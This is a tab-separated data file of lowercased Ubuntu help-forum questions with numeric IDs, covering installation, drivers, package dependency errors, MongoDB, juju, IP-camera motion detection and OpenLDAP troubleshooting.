514693	installing ubuntu phne on a doogee turbo 2014 -	im afraid i am fairly new to the wonderful world of linux ubuntu . is there anyone here who could give me some simle steps or point me in the direction of how to install ubuntu phone on a doogee turbo 2014 mobile phone . i think i understand how to install ubuntu phone on a regular android phone but i have read many articles from people who are struggling to install the os on chinese mtk phones like mine . are there any special drivers or tips you know of so i can enjoy ubuntu phone on my phone . thanks for any help with this , have a great weekend . jay jay
514694	reverse all words in current line	i have a file and i want to reverse all word in it . ex input file : dcba . hgfe.gi mlk , pon.rq uts . zyxwv . 321 ex output file : ( what i want ) abcd . efgh.ig klm , nop.qr stu . vwxyz . 123 with this sed script : sed '/\n/ ! g ; s/\ ( .\ ) \ ( . *\n\ ) / & \2\1/ ; //d ; s/.// ' all the entire line is reversed . the wrong output produced by the command above : ig.efgh .abcd qr.nop , klm 123 .vwxyz .stu how can i get my desired output ?
514696	reset to factory conditions ?	is it possible to reset ubuntu 14.04 to factory conditions or remove all programs . i tried ubuntu advanced option ( safe mode ) . i 'm new to ubuntu .
514701	setting the mongodb	mongodb needs some configuration to run . it needs to create this hierarchy /data/db/ . where can i find mongo files ? and where do i create this directories ? !
514702	installing ubuntu on 3tb hard drive	recently , i bought a desktop pc ( asus z87-pro v ) with 3tb hard disk . i have been trying to install linux on it . it has been installed well but it drops on bios after installation . i have tried different versions of linux but the same thing happened , it just went to bios after installation . would some one please help me with that ? please , give me simple answers with details since i am a beginner .
514703	how do i know my mac address ?	how to check mac address of our system through terminal in ubuntu 10.04lts ipconfig/all
514704	bumblebee on ubuntu 14.04 amd64 does not work	my notebook has nvidia optimus gt550m and cpu intel i5-2450m . i installed ubuntu 14.04.1 amd64 desktop version . according this wiki page : https : //wiki.ubuntu.com/bumblebee # installation i install bumblebee using `` sudo apt-get install bumblebee bumblebee-nvidia primus linux-headers-generic '' . after reboot , i run some commands : $ optirun -- status bumblebee status : ready ( 3.2.1 ) . x inactive . discrete video card is off . $ optirun glxgears [ 346.823009 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia gpu at pci:1:0:0 . please [ 346.823050 ] [ error ] aborting because fallback start is disabled . at that time , my nvidia driver is 304 . then i installed nvidia-331 with apt-get install nvidia-331 . i find i can run optirun glxgears with nvidia-331 . but the value is very low . $ optirun glxgears 293 frames in 5.0 seconds = 58.545 fps 300 frames in 5.0 seconds = 59.971 fps 300 frames in 5.0 seconds = 59.971 fps 300 frames in 5.0 seconds = 59.977 fps 300 frames in 5.0 seconds = 59.970 fps 300 frames in 5.0 seconds = 59.966 fps 300 frames in 5.0 seconds = 59.967 fps nvidia-settings has no more setting items . what is the matter ? thanks
514708	how to find a window which should be visible on ubuntu 14.04	in ubuntu 14.04 i have keepass2 in my launchbar . i do execute keepass and i can see it is executing by a small arrow . with statement : ps - fu bernard | grep keepass2 results into : bernard 2433 1697 0 16:31 ? 00:00:15 /usr/bin/cli /usr/lib/keepass2/keepass.exe bernard 3263 3212 0 17:00 pts/0 00:00:00 grep -- color=auto keepass2 so keepass is running . also with alt-tab i see keepass . if i click on the keepass icon still i am not switched to keepass . the same happened to me with xampp from https : //www.apachefriends.org , and to the ubuntu update manager . so it seems a general ubuntu 14.04 problem . with alt-tab i can switch to the running firefox windows , so alt-tab itself seems to work . i execute this in virtualbox client . if i switch to other vb client , when i come back the window is sometimes visible .
514710	proper way to uninstall ubuntu server	i have installed ubuntu server on windows 8.1 hyper-v virtual machine . as part of learning i just want to remove the ubuntu server completely so that i can reinstall the server once again to get a better understanding of the installation process . if i delete the virtual machine ( by remove option in hyper - v ) i am able to delete the server and the hard disc where the server is installed . but using this process my host os windows 8.1 is getting corrupted and i had to reinstall the windows os ( tried this 3 times already ) . can someone please tell me the right way of uninstalling the ubuntu server from the hyper-v virtual machine .
514714	.png images will not display on webpage	i am having an issue where my '.png ' images will not display in my webpage . i am running 12.04 server . the images are linked and called right in the code . the server recognizes that the files are there , aka not 404 error . is there a special library i need for '.png ' pictures ?
514718	how can i use sudo after locking my password ?	i was reading about passwordless authentication with ssh . so i made a key and published it to my ubuntu server , and it worked well . then decided to lock my password with passwd -l lucas , and i was not longer able to use sudo . i was thinking that sudo would also be without a password . my question now is : how can i regain the ability to use sudo ?
514721	problems connecting to eduroam wifi - ubuntu touch	i am trying to connect to our university 's eduroam wi-fi network with my nexus 4 running ubuntu touch ( utopic latest build ) , but ca n't get past the first stage . i wonder if anyone can help please ? i am following these instructions ( which worked for my iphone ) : http : //www.st-andrews.ac.uk/itsupport/mobile/eduroam/ but when i go to the bandit.st-andrews.ac.uk/connect page then follow the link to 'eduroam setup ' i get the error message : authorization required this server could not verify that you are authorised to access the document requested . either you supplied the wrong credentials ( e.g. , bad password ) , or your browser does n't understand how to supply the credentials required . apache/2.2.16 ( debian ) server at bandit.st-andrews.ac.uk port 443 ( clearly it 's the latter option ( browser ) as i have n't been asked for my credentials yet . ) is there a way round this , or am i just not going to be able to connect until further down the ubuntu touch development road ... thanks !
514724	after reboot allocated node gets commissioned again	si had set up a maas with juju and deployed openstack into it for testing . during my vacation i shut down all computers . afterwards i started at first the maas server , then the node where juju was bootstrapped and juju-gui was deployed to . sadly the node got commissioned again and so all my deployments are gone . i decomissioned the according node from the maas and bootstrapped it again . afterwards i tested again juju bootstrapping the node , shutting down both nodes and starting them in the same order again . the juju node gets commisioned again . after bootstrapping everything looked fine in the maas gui ( node was set to allocated to root , which was also the case after the restart ) and also the juju gui was available and juju status worked fine . before my vacation i also had some other nodes deployed through juju . they all seem to be still available and have not been commisioned again . do you have any ideas what might have happened ? is there any issue with a bootstrapped juju node and the commisioning ? any help or hints on what i could check are appreciated ! thanks in advance for your help ! edit : additional information : i am using ubuntu server 14.04
514725	is something wrong with my partitioning ?	i have just installed ubuntu 12.04 on my laptop.. i wonder if i have done the partition right ?
514727	dual-booting help	i installed ubuntu on a drive that has windows 7 on it as well . now i need to get back to windows , but because they 're on the same drive , booting from that drive takes me to ubuntu . i ca n't find any help with grub command lines . i ca n't find any boot selection menus . how would i be able to fix this ?
514728	ca n't deploy charms due to missing metadata files	i 'm trying to run juju deploy from my local repository : juju deploy -- repository=charms local : precise/stack when i do i get this message : warning failed to load charm at `` /home/eduard/charms/precise/hooks '' : open /home/eduard/charms/precise/hooks/metadata.yaml : no such file or directory warning failed to load charm at `` /home/eduard/charms/precise/hooks '' : open /home/eduard/charms/precise/hooks/metadata.yaml : no such file or directory added charm `` local : precise/stack-48 '' to the environment . the charm is running normally but i like this ad quu not continue appearing . i appreciate the help in advance
514737	usb image writer for a distro that is n't ubuntu ?	for some reason , startup disk creator only installs ubuntu-derivatives in usb 's , and unetbootin wo n't install suse in the drive ( it gets stuck ) . i tried to install image writer , but it is n't available for ubuntu anymore . not sure why , because it 's a great tool . anyone know another usb-writer applications out there ?
514738	ubuntu for lenovo e531	a week ago i bought lenovo e531 with windows 8 , but i do n't like this operating system . i used to use win xp . i downloaded ubuntu 12.10 , followed all the instruction how to create an bootable usb stick , but my laptop ca n't boot ubuntu yet . can you help me please !
514739	can not access desktop after downloading 14.04 upgrade	i recently downloaded 14.04 on my system 76 computer to upgrade from 12.04 and now when i boot up my computer , it defaults to the `` gnu grub v 1.99-ubuntu3.1 '' screen with the option to boot up with older versions of ubuntu . nothing has worked that i 've tried , including downloading the iso for 14.04 . should i order an ubuntu disk to boot from or are there other commands i can use to get my computer back ?
514742	installing wireless returns error	i downloaded compat-wireless to install wireless but when i write - make - in terminal it returns this : make -c /lib/modules/3.2.0-23-generic-pae/build m=/home/linz/mine/compat-wireless-2012-12-18 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-23-generic-pae' scripts/makefile.build:44 : /home/linz/mine/compat-wireless-2012-12-18/drivers/net/ethernet/atheros/alx/makefile : no such file or directory make [ 4 ] : *** no rule to make target `/home/linz/mine/compat-wireless-2012-12-18/drivers/net/ethernet/atheros/alx/makefile ' . stop . make [ 3 ] : *** [ /home/linz/mine/compat-wireless-2012-12-18/drivers/net/ethernet/atheros/alx ] error 2 make [ 2 ] : *** [ /home/linz/mine/compat-wireless-2012-12-18/drivers/net/ethernet/atheros ] error 2 make [ 1 ] : *** [ _module_/home/linz/mine/compat-wireless-2012-12-18 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.2.0-23-generic-pae' make : *** [ modules ] error 2 what shall i do ?
514743	add folder name on desktop	i can not get the title of a folder on my desktop to display the name . is there a way to get this working in 14.04 ? this ( from a mac ) is what i am trying to get to : this is what my ubuntu 14.04 desktop looks like , with two folders . those folders do not have labels , so i do n't know which is which .
514744	gnome on ubuntu 14.04 error when install	i want install gnome shell in ubuntu 14.04 , and i have added `` ppa sudo add-apt-repository ppa : gnome3-team/gnome3 '' and then i install `` sudo apt-get install gnome-shell ubuntu-gnome-desktop '' , i have this error '' gnome-shell : depends : gnome-icon-theme-full but it is not going to be installed '' '' depends : gnome-session but it is not going to be installed '' '' recommends : gnome-control-center but it is not going to be installed '' '' ubuntu-gnome-desktop : depends : gnome-control-center but it is not going to be installed '' '' depends : gnome-icon-theme-full but it is not going to be installed depends : gnome-online-accounts but it is not going to be installed depends : gnome-session but it is not going to be installed depends : gnome-shell-extensions but it is not going to be installed recommends : evolution but it is not going to be installed recommends : mcp-account-manager-goa but it is not going to be installed e : unable to correct problems , you have held broken packages . '' what should i do to fix this error ?
514745	how to setup password-less ssh in ubuntu virtual machine ?	how can i set up password-less ssh to connect to a ubuntu virtual machine ( vm ) ? ( details below . ) i am setting up an ubuntu beowulf cluster . for reasons out of my control , some machines i have must have windows 7 running on them . i want to still use these machines in the cluster however , so i installed ubuntu 14.04.1 lts in virtulbox on them . i have the virtualbox network adapter setup as `` bridged adapter '' and `` promiscuous mode : allow all '' . virtual ubuntu has a static ip address and can successfully connect to the internet . i can ssh into my ubuntu vm from the server machine which is running ubuntu 14.04.1 lts ( not in virtualbox ) , but it asks me for the password of the user on the ubuntu vm . if i type in the password , it successfully connects . i tried setting up passwordless ssh following the instructions from here : https : //help.ubuntu.com/community/mpichcluster and i can successfully connect to nodes ( clients ) that run native ubuntu without typing in a password . however , when i try to connect to either of my ubuntu vms ( i have two of them ) it still asks for a password . so , how do i get password-less ssh working with ubuntu vms also ?
514746	how to adjust screen brightness of acer aspire 573z ?	i have tried many thing given on internet and also on ubuntu but nothing works .
514748	what does /dev/null mean in a shell script ?	i 've started learning bash scripting by using this guide : http : //www.tldp.org/ldp/abs/abs-guide.pdf however i got stuck at the first script : cd /var/log cat /dev/null > messages cat /dev/null > wtmp echo `` log files cleaned up . '' what do lines 2 and 3 do in ubuntu ( i understand cat ) ? is it only for other linux distributions ? after running this script as root , the output i get is log files cleaned up . but /var/log still contains all the files .
514750	installing webkit	first : sudo add-apt-repository ppa : webkit-team by the foolowing command sudo apt-get update i got the following message ( httpxx should be read as url ) : ign httpxxde.archive.ubuntu.com trusty/main translation-de_de ign httpxxde.archive.ubuntu.com trusty/multiverse translation-de_de ign httpxxde.archive.ubuntu.com trusty/restricted translation-de_de ign httpxxde.archive.ubuntu.com trusty/universe translation-de_de es wurden 1.462 kb in 5 s geholt ( 268 kb/s ) . w : fehlschlag beim holen von httpxxppa.launchpad.net/webkit-team/ppa/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : fehlschlag beim holen von httpxxppa.launchpad.net/webkit-team/ppa/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : einige indexdateien konnten nicht heruntergeladen werden . sie wurden ignoriert oder alte an ihrer stelle benutzt .
514753	problem after upgrading to 14.04 : unable to mount - not authorized	this is the first time i ever post on this forum . i have used ubuntu for 7 years , and every time i 've had a problem , i have browsed the web and i have been able to solve it thanks to the help given on forums to other users experiencing the same issues ( i do not have technical knowledge on ubuntu ) . this time , i 've spent hours reading forums and typing commands and nothing helps . i am exhausted . upgrading to 14.04 has proved itself a mistake . many things wo n't work anymore . but the one which worries me right now is external media not automounting anymore . i know other people have had the same issue and i have carefully read their threads , but nothing helps ! !
514754	where are deb packages which are downloaded by apt-get stored in ubuntu 14.04	i used to find deb packages which are downloaded by apt-get in the /var/cache/apt/archives directory . i 've installed ubuntu 14.04 recently but i fount out the deb packages are n't stored to the directory . i use ubuntu 64 bit .
514756	how to fix error when install gnome on ubuntu 14.04	i want install gnome shell in ubuntu 14.04 , and i have added ppa sudo add-apt-repository ppa : gnome3-team/gnome3 and then i install sudo apt-get install gnome-shell ubuntu-gnome-desktop i have this error gnome-shell : depends : gnome-icon-theme-full but it is not going to be installed depends : gnome-session but it is not going to be installed recommends : gnome-control-center but it is not going to be installed ubuntu-gnome-desktop : depends : gnome-control-center but it is not going to be installed depends : gnome-icon-theme-full but it is not going to be installed depends : gnome-online-accounts but it is not going to be installed depends : gnome-session but it is not going to be installed depends : gnome-shell-extensions but it is not going to be installed recommends : evolution but it is not going to be installed recommends : mcp-account-manager-goa but it is not going to be installed e : unable to correct problems , you have held broken packages . what should i do to fix this error ?
514757	32 bits processor and partition size on ssd	i am looking for advice . i have just installed ubuntu on my 1t ssd . i want to separate the os from new data i will put there . i have a 32-bit processor : any advice or constraint on the size of the new partitions i will create for my data ? thanks in advance .
514760	ubuntu 14.04 64-bit : resolution reset after reboot / hdmi display wrong colors	situation i have attached my pc , which has a nvidia geforce gt-610 graphics card , to my samsung led tv with an hdmi cable . i have ubuntu 14.04 installed . problem the image does n't seem to be correct . it seems to be using too much red . by default it 's using the xorg graphics driver . but even with the different nvidea drivers the problem does n't go away . only when i use the nvidea driver and change the resolution from 1920x1080 to 1600x900 the image gets a little bit darker and the red glow disappears . the problem is that after a reboot the resolution is reset back to 1920x1080 . things i 've tried creating a script which sets the resolution to 1600x900 at startup . this works a little . i see that my tv switches 3 times from resolution but than remains on 1600x900 . but when i switch off the tv and turn it on 30 minutes later its back to 1920*1080 switching different drivers in the additional drivers section trying different color profiles but the image didnt improve trying a different hdmi cable , still same result . further research besides the resolution problems , i got also some dialogs like : a system program problem detected . so i figured that my installation was just messed up and therefore i started a fresh install on a vm which i later convert to my psychial system . the strange thing is that after the fresh install of 14.04/13.10 & 13.04 i keep having the problems : resolution is reset after reboot on 13.10 i received after a few reboots again the `` a system program problem dialog '' when i check the /var/crash reports i find that is saying something about gnome-settings deamon . even with unity 14.04 the resolution is reset do you guys have any ideas ?
514766	ubuntu 14.04 systray icons open menu on left click	in ubuntu 14.04 , when left clicking systray icons like google hangouts or chromium , the context menu opens . this also happens when right clicking . for some icons this is logical ( volume , time , etc ... do n't have an application behind it ) but hangouts opens a menu with `` hangouts '' to open the hangouts app . pretty retarded ... in short , does anyone know how to make application systray icons open their applications ( or first menu item ) when left-clicking ?
514768	how i can hide scrollbar at terminal xubuntu 14.04 ?	with dark terminal white scrollbar looks bad .
514771	what is wrong with this script ?	so i got this script from this guide : www.tldp.org/ldp/abs/abs-guide.pdf log_dir=/var/log root_uid=0 lines=50 e_xcd=86 e_notroot=87 if [ `` $ uid '' ! = `` $ root_uid '' ] then echo `` must be root to run this script . '' exit $ e_notroot fi if [ -n `` $ 1 '' ] then lines= $ 1 else lines= $ lines fi cd $ log_dir if [ 'pwd ' ! = `` $ log_dir '' ] then echo `` ca n't change to $ log_dir . '' exit $ e_xcd fi now i did sudo su on terminal and echoed $ uid which gives me 0 . that means my if condition turns out to be false but still i am getting `` must be root to run this script . '' while running this script . also in original script this if condition was given as if [ `` $ uid '' -ne `` $ root_uid '' ] but i was getting illegal number error because apparently -ne is only used for string so i changed it to ! = .
514776	why do i have lots of gnucash files in my folder ?	i recently installed gnucash , to help me keep track . i saved it in my banking folder , and after 2 days . i have ~15 files in there . bank.gnucash bank.gnucash.20140821225206.gnucash bank.gnucash.20140821221604.gnucash bank.gnucash.20140822085620.gnucash bank.gnucash.20140821222109.gnucash bank.gnucash.20140822085649.gnucash bank.gnucash.20140821222617.gnucash bank.gnucash.20140822090226.gnucash bank.gnucash.20140821223138.gnucash bank.gnucash.20140822190304.gnucash bank.gnucash.20140821223643.gnucash bank.gnucash.20140822190805.gnucash bank.gnucash.20140821224145.gnucash bank.gnucash.20140822191307.gnucash bank.gnucash.20140821224705.gnucash bank.gnucash.20140822191407.gnucash why have all these files appeared , can i delete them ?
514779	why my alt tab has become ugly ? under kubuntu 14.04	i do n't know why and when it happened , but now , when i use alt+tab , it only displays icons of the applications instead of previews . also , when i moved the cursor of my mouse in the top left corner of the screen , an overview of all windows was displayed . now it has no effect anymore . i think that i might have unintentionally removed a package but i do n't know which one . how can i fix this ?
514781	batch export torrent files from ktorrent	to export single torrent file : right mouse click - > advanced - > export torrent to export n torrent files : ? ? ?
514782	lost dropbox tray icon on ubuntu 12.04	i 've just updated my dropbox version by uninstalling the old ( unsupported ) version ( but which has worked flawlessly for years ) and installing version 1.6.2 from the dropbox site . following the upgrade , the system tray icon is no longer visible . i 've tried re-installing to no effect . dropbox does seem to be working but i could do with the tray icon back so that i can change my preferences .
514788	.tmp_vmlinux1 error on ubuntu ( kernel compilation ) ?	im compiling the google play edition stock kernel for the htc one m8 varient . the kernel is 3.4.0-gb1b6fb1 for android 4.4.4 . im using ubuntu 14.04.1 lts . i used the following command : make -j2 arch=arm cross_compile=/home/richard/workspace/toolchains/arm-eabi-linaro-4.6.2/bin/arm-eabi- . so here is the error : ld .tmp_vmlinux1 drivers/built-in.o : in function dwc3_msm_probe ' : /home/richard/workspace/kernel1/drivers/usb/dwc3/dwc3-msm.c:2561 : undefined reference torom_stockui' make : * [ .tmp_vmlinux1 ] error 1 how can i fix this ? im working on a project that is due in two days . any help is appreciated !
514790	why does n't 'launcher.set_property ( `` urgent '' , true ) ' work ?	my script : # ! /usr/bin/python # update bar on dash icon by stdin # ex : for i in { 0..100 } ; do echo `` $ i '' ; sleep 0.3 ; done | ./ $ 0 import sys , time from gi.repository import unity , gio , gobject , dbusmenu loop = gobject.mainloop ( ) launcher = unity.launcherentry.get_for_desktop_id ( `` launcher.desktop '' ) launcher.set_property ( `` progress_visible '' , true ) def update_line ( ) : line = sys.stdin.readline ( ) while line : line = float ( line ) * .01 launcher.set_property ( `` progress '' , line ) line = sys.stdin.readline ( ) if len ( line ) == 0 : # fin de ~ '' fichier '' launcher.set_property ( `` urgent '' , true ) time.sleep ( 3 ) print `` it 's the end ... '' loop.quit ( ) return true gobject.timeout_add_seconds ( 1 , update_line ) loop.run ( ) if i place launcher.set_property ( `` urgent '' , true ) ( actually line 20 ) before the if condition ( line 19 ) , it works one time , allright . but if i want it works only when no more entry on stdin , and i place it after the if condition , it does n't work . what is it wrong ? i do n't understand !
514791	kyocera job accounting and document box	i work at school and we have many xp machines . a few machines i have converted to various light linux versions . the problem i am having is with the kyocera printers . we use job accounting and the kyocera drivers have to be setup to prompt for an account code in order to print . one location the problem is even more challenging . the user is prompted for a code , but the document is not printed . the kyocera stores the document to that users document box on the kyocera . the driver on the windows machine at time of install is given a box number that corresponds to one user account/code on the kyocera . any ideals ? thanks , jk
514792	does upgrading to new version deletes my current package ?	i want to upgrade to ubuntu 14.04 from 12.* . but i dont want to loose my currently installed packages . does upgrading to new version deletes my current package ?
514795	need to know best way to utilize lvm to backup ubuntu	so i 've had issues with windows which forced me to install and learn ubuntu as i 'm fed up with msft . so now i need to know the most efficient/best way to image ubuntu so that if i messed something up in one point in time i could always come back to the healthy point in time . during the install i saw an option for lvm and read what it is though i do n't know how to utilize it to prevent a situation where i have to reinstall everything . help ? note : i found on the right hand side of this ask a question area an area titled similar questions giving me setting up lvm snapshot as a backup/restore point in ubuntu this is pretty in depth and a bit complex , though completely doable , is it possible to just use lvm out of the box after a complete hdd wipe and normal ubuntu install ? : fingers crossed and rabbits foot in hand :
514799	partition hardware as windows when installing ubuntu	how can i partition my hardware when install ubuntu as windows until when i want to re-install ubuntu my data remain ? let me clarify you : when you install windows you partition your hardware to 4 drive and then install windows in drive c and after months you want to re-install windows so you install windows in drive c again and when install it all your data which are in drive d , e , f will remain
514801	suspend does not work on hp pavilion g6 with ubuntu 14.04	i 've installed ubuntu 14.04 on an hp pavilion g6 laptop . most things seem to work except suspend and the backlight brightness . i can live with the backlight issue for now . i have tried using the default graphics driver as well as the restricted drivers and amd 's latest catalyst drivers ; no luck . when i suspend the system , the screen goes blank and the backlight flashes on and off a few times . then after a few seconds , the login screen appears . if i close the lid , i assume the same thing happens because the fans never go off . i 'm not sure what the issue is . does anyone know how to fix it or how i can go about diagnosing the problem ( e.g . logs to check , etc . ) ?
514802	thick black edges appear after coming out of sleep ubuntu	when my laptop comes out of sleep , there are thick black edges appear behind each window . this happens to all ui elements which cast a shadow , like some dropdowns an textbox suggestions . these thick black edges do not go away until i restart laptop . i had upgraded from ubuntu 13.10 to 14.04 when this problem started occurring . i have installed all updates , but still this issue persists . has anyone faced this problem before and found any solution ? my laptop model is hp pavilion dv-7t 3000 and graphics card model is nvidia geforce gt 230m ( n10p-ge ) .
514803	do not get an iso image when downloading latest ubuntu 32/64 bit what am i doing wrong	have downloaded and then unzipped ubuntu 14.04.1 lts on 8/22/14 to my windows 7 desktop . i get lots of folders and files after unzipping , but can not figure out how to create the iso image . my goal is to do so on a usb stick , but have n't been able to get to that step , wah !
514816	theme lightdm-gtk-greeter	there are a couple of question that deals with changing the icon theme / desktop theme of the lightdm-greeter . i wonder if it is possible to change other parameters of the greeter in order to be consistent with the desktop . what i want to be changed at the greeter : panel opacity which can be set using ccsm for the desktop scaling factor for the menu and panel notify-osd with notifyosdconfig ( when using this ppa : https : //launchpad.net/~leolik/+archive/ubuntu/leolik ) is something ( i think notify-osd is probably hard to do ) of this themable for the lightdm-greeter ? i 'm running 14.04 , thanks
514820	unresolvable broken packages	i have been desperate to resolve this problem as i am not being able to install certain programs . my computer says that i have broken packages : the following packages have unmet dependencies : python3-requests : depends : python3-chardet ( > = 2.2.1 ) but 2.0.1-1 is to be installed e : unable to correct problems , you have held broken packages . but when i check in synaptic manager i ca n't find any broken packages . i ca n't re-install python3-requests for some reason . and for some reason all the other steps to clean up unmet dependencies or broken packages such as sudo apt-get install -f , autoremove , upgrade , etc do n't seem to work . please someone help !
514821	file system needed	i have a 1 tegabype hard drive formatted as ntfs running ms windows vista ultimate 32 bit . i created a 26 gig partition d : using a partition program and it is formatted as ntfs . when i boot off of my unbuntu linux 14 disk and select the d : partition it says no root system defined . i do not know how to fix this for installing linux . i could use the option to install beside windows but it only offered to create a partition on my 500 gig external backup hard drive . when i was running linux 11 it could be installed within windows you create a dual boot system setup and could be removed through windows uninstall program .
514822	joomla with postfix php mail not working	i am getting this error in mail.log ( after trying to submit a contact form ) : fatal : recipient addresses must be specified on the command line or via the -t option its worth mentioning that i have tried sending a sample mail using the terminal and it worked..i received it normally into my inbox . but it does n't want to work with joomla contact ( php mailer ) form . if someone could give me a slight push i would be grateful . i do n't have experience with postfix nor do i understand what does that error mean . keep in mind once again : php mail is working when i telneted with terminal and echoed a sample mail on the terminal , so those part of settings are obviously correct .
514823	how to overcome the `connect failed` exception with mongodb ?	i have installed mongodb once both trough the package manager ( and purged it ) and once following the official install instructions . when running mongo i get the error mongodb shell version : 2.4.11 connecting to : test fri aug 22 22:07:28.792 error : could n't connect to server 127.0.0.1:27017 at src/mongo/shell/mongo.js:145 exception : connect failed when i run sudo service mongodb start it outputs mongodb start/running , process 4378 , but when i then immediately run sudo service mongodb status , i get mongodb stop/waiting . i have already tried : to sudo rm -rf /var/lib/mongodb/mongod.lock mongod -- repair i have checked the permissions : ls -al /var/log/mongodb/ total 48 drwxr-xr-x 2 mongodb mongodb 4096 aug 22 21:27 . drwxrwxr-x 23 root syslog 4096 aug 22 22:07 .. -rw-r -- r -- 1 mongodb mongodb 36676 aug 22 22:07 mongodb.log ls -al /var/lib/mongodb/ total 12 drwxr-xr-x 3 mongodb mongodb 4096 aug 22 22:05 . drwxr-xr-x 98 root root 4096 aug 22 21:27 .. drwxr-xr-x 2 mongodb mongodb 4096 aug 22 21:27 journal -rwxr-xr-x 1 mongodb nogroup 0 aug 22 22:07 mongod.lock all this was to no avail . any suggestions ? other things i can check ? i am running 14.04 .
514826	can i run microsoft office 2013/2014 ?	is there a way to run microsoft office 2013 or 2014 on ubuntu 14.04 ? wine wo n't work .
514827	how can i set icons on a desktop accessed via a vnc server	i 'm on ubuntu 14.04 . i have a desktop accessed via virtual desktop with icons set how i like . however , when i start a vnc server and access the desktop via said vnc server , the icons are there but are the default ( document ) icons . i have tried the following on the vnc server desktop to remedy this and neither have worked : 1 ) right-click on an icon , select properties and try setting the icon picture anew . 2 ) restart the computer without subsequently logging in to it locally or through virtual desktop , log into the computer through putty , and then start the vnc server anew . i used the answer posted at the below link for my ~/.vnc/xstartup file : how to make vnc server work with ubuntu-desktop without xfce so as you can see , i 'm using gnome . anyone have any ideas ? thanks .
514828	how can i access the h264 stream from my ip-cam with `` motion '' ?	what is motion ? : motion is a deamon application which allows linux users to record pictures of webcams and ipcams based on motion detection or time settings . a tutorial how to set up the stable release can be found here . here is the motion developer website and documentation my setup : i 'm using a cheap hikvision 2032 ip-camera , which is set to ip 192.168.1.199 . its mainstream ( h264 ) is : rtsp : //192.168.1.199:554/isapi/streaming/channels/101 ? auth=ywrtaw46mtizndu= ( it is working fine in vlc ) as i 've been told motion unfortunately does n't supports h264 in its current stable release ( 3.2.12 ) . but the latest developers build has some integration and that there is a fork which is optimized for it . the installation of the builds is highly complicated though and i try to collect the tips i get in step-by-step instructions in my posting below : edit : at this stage i 've downloaded the git version mrdave recommended me below and i think i have all dependencies . after following the steps in my collected instructions it finally works at 1080x720 resolution . i have the problem to save files to my images folder when using 1920x1080 : nuc @ nuc : /usr/local/etc $ motion [ 0 ] [ ntc ] [ all ] conf_load : processing thread 0 - config file /usr/local/etc/motion.conf [ 0 ] [ alr ] [ all ] conf_cmdparse : unknown config option `` sdl_threadnr '' [ 0 ] [ ntc ] [ all ] motion_startup : motion trunkrevunknown started [ 0 ] [ ntc ] [ all ] motion_startup : logging to syslog [ 0 ] [ ntc ] [ all ] motion_startup : using log type ( all ) log level ( ntc ) [ 0 ] [ ntc ] [ enc ] ffmpeg_init : ffmpeg libavcodec_build 3562596 libavformat_build 3555176 [ 0 ] [ ntc ] [ all ] main : thread 1 is from /usr/local/etc/motion.conf [ 0 ] [ ntc ] [ all ] main : thread 1 is device : rtsp : //192.168.1.199:554/isapi/streaming/channels/101 ? auth=ywrtaw46mtizndu= input -1 [ 0 ] [ ntc ] [ all ] main : stream port 8081 [ 0 ] [ ntc ] [ all ] main : waiting for threads to finish , pid : 9028 [ 1 ] [ ntc ] [ all ] motion_init : thread 1 started , motion detection enabled [ 1 ] [ alr ] [ net ] netcam_start : network camera thread starting ... for url ( rtsp : //192.168.1.199:554/isapi/streaming/channels/101 ? auth=ywrtaw46mtizndu= ) [ 0 ] [ ntc ] [ str ] httpd_run : motion-httpd testing : ipv4 addr : 127.0.0.1 port : 8080 [ 0 ] [ ntc ] [ str ] httpd_run : motion-httpd bound : ipv4 addr : 127.0.0.1 port : 8080 [ 0 ] [ ntc ] [ str ] httpd_run : motion-httpd/trunkrevunknown running , accepting connections [ 0 ] [ ntc ] [ str ] httpd_run : motion-httpd : waiting for data on 127.0.0.1 port tcp 8080 [ 1 ] [ ntc ] [ net ] netcam_rtsp_open_context : using tcp transport [ 1 ] [ ntc ] [ net ] netcam_connect_rtsp : camera connected [ 1 ] [ ntc ] [ all ] image_ring_resize : resizing pre_capture buffer to 1 items [ 1 ] [ alr ] [ net ] netcam_handler_loop : camera handler thread [ 2 ] started [ 1 ] [ ntc ] [ str ] http_bindsock : motion-stream testing : ipv4 addr : 127.0.0.1 port : 8081 [ 1 ] [ ntc ] [ str ] http_bindsock : motion-stream bound : ipv4 addr : 127.0.0.1 port : 8081 [ 1 ] [ ntc ] [ all ] motion_init : started motion-stream server in port 8081 auth disabled memoryaccesserror ( core image written ) . the avi and jpg in full resolution are empty or not availabe if i try to open .
514829	virtualbox guest additions wo n't install	i 'm trying to configure my virtual machine so i can share a folder between my host and guest os , but when i try to install the guest additions i get the following message : i 've already done everything that is describe on : virtualbox guest additions wo n't install on ubuntu server 12.04 but it 's still not working . [ solution ] as said in the comments , all i had to do was install the newest version . after that , it worked perfectly .
514831	ubuntu home folder add items	i have a recently installed ubuntu system ( 14.04 lts ) . on my old system the home folder showed a `` file system '' option which allowed me to get at all the folders in the root directory . however , in my new system that option is not there . how do i revise my home folder so as to get access to these other folders and files ?
514836	has anybody gotten openldap password policy to work on 12.04 or 14.04 ?	i have installed the overlay , set up a default policy , i see in syslog that the policy is being referenced , but it does not seem to be enforced . specifically , i have been testing out pwdminlength of 10 . however , i can change the password to anything of 6 characters or longer . i 've messed with the slapd config , pam , ldap.conf ... i just ca n't figure it out . here is my /etc/pam.d/common-passwd : password [ success=2 default=ignore ] pam_unix.so obscure sha512 password [ success=1 user_unknown=ignore default=die ] pam_ldap.so password requisite pam_deny.so password required pam_permit.so here is my overlay : root @ ldap : /etc/ldap/slapd.d/cn=config/olcdatabase= { 1 } hdb # cat olcoverlay\=\ { 0\ } ppolicy.ldif # auto-generated file - do not edit ! ! use ldapmodify . # crc32 e13ac822 dn : olcoverlay= { 0 } ppolicy objectclass : olcoverlayconfig objectclass : olcppolicyconfig olcoverlay : { 0 } ppolicy olcppolicydefault : cn=default , ou=policies , dc=mydomain , dc=local olcppolicyuselockout : false olcppolicyforwardupdates : false structuralobjectclass : olcppolicyconfig entryuuid : 73ace97c-bd97-1033-89a7-83eeab8cfd47 creatorsname : cn=config createtimestamp : 20140821155626z olcppolicyhashcleartext : true entrycsn : 20140822194949.226250z # 000000 # 000 # 000000 modifiersname : cn=admin , cn=config modifytimestamp : 20140822194949z root @ ldap : /etc/ldap/slapd.d/cn=config # grep -r pol * cn=module { 0 } .ldif : 